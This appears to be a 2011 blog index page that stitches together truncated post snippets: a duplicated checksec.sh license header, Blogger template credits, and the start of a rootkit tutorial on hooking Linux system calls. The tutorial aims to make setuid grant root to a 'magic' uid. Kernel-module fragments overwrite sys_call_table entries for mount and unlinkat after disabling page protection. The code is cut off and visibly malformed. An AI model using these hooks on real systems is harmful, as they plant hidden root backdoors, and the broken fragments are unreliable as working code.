Since the late nineties, the Internet has grown at an exponential rate. One of the biggest spurts in growth came between the years of 1995-2000 with the dot-com bubble that prompted the spawn of e-commerce for virtually every facet of society. The success of the Internet has brought great change to the world as we know it; however, not all of this growth has been productive. With thousands of sites launching daily and limited resources available to monitor the credibility and/or security of these sites the existence of vulnerabilities was inevitable.
Aug 18, 2011
Aug 16, 2011
Gandalf Kernel Checking
#!/bin/bash
#
# The BSD License (http://www.opensource.org/licenses/bsd-license.php)
# specifies the terms and conditions of use for checksec.sh:
#
# Copyright (c) 2009-2010, Tobias Klein.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#
# The BSD License (http://www.opensource.org/licenses/bsd-license.php)
# specifies the terms and conditions of use for checksec.sh:
#
# Copyright (c) 2009-2010, Tobias Klein.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
Aug 14, 2011
Blogger Template!
Name: Pyrmont V2
Designer: motta y Dhampire
URL: http://imotta.cn/ y dhampirito.blogspot.com
Date: 29 Jun 2009
Updated by: Dhampire
Designer: motta y Dhampire
URL: http://imotta.cn/ y dhampirito.blogspot.com
Date: 29 Jun 2009
Updated by: Dhampire
Mar 23, 2011
Kernel Mode Testing Plann
--[ 0x01 Introduction
In this article I will show you the basic technique that rootkits use,
which we can use to hook system calls in kernel mode. I will deal only
with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to
hook the setuid system call which when takes a "magic" uid as an
argument it will give root to the process.
Mar 21, 2011
Credintealist
void cleanup_moint init_module(void)
{
disable_page_protection();
ori_mount=sys_call_table[__NR_mount];
sys_call_table[__NR_mount]=hack_mount;
enable_page_protection();
return
Location:
Surabaya, Indonesia
Mar 16, 2011
Redemption
#include <linux/module.h>
#include <linux/kernel.h>
char *pattern="michaless";
void **sys_call_table = (void *)0xc1958140;
asmlinkage int (*ori_unlinkat)(int dirfd,char *pathname,int flags);
asmlinkage int hack_unlinkat(int dirfd,char *pathname,int flags)
{
Subscribe to:
Posts (Atom)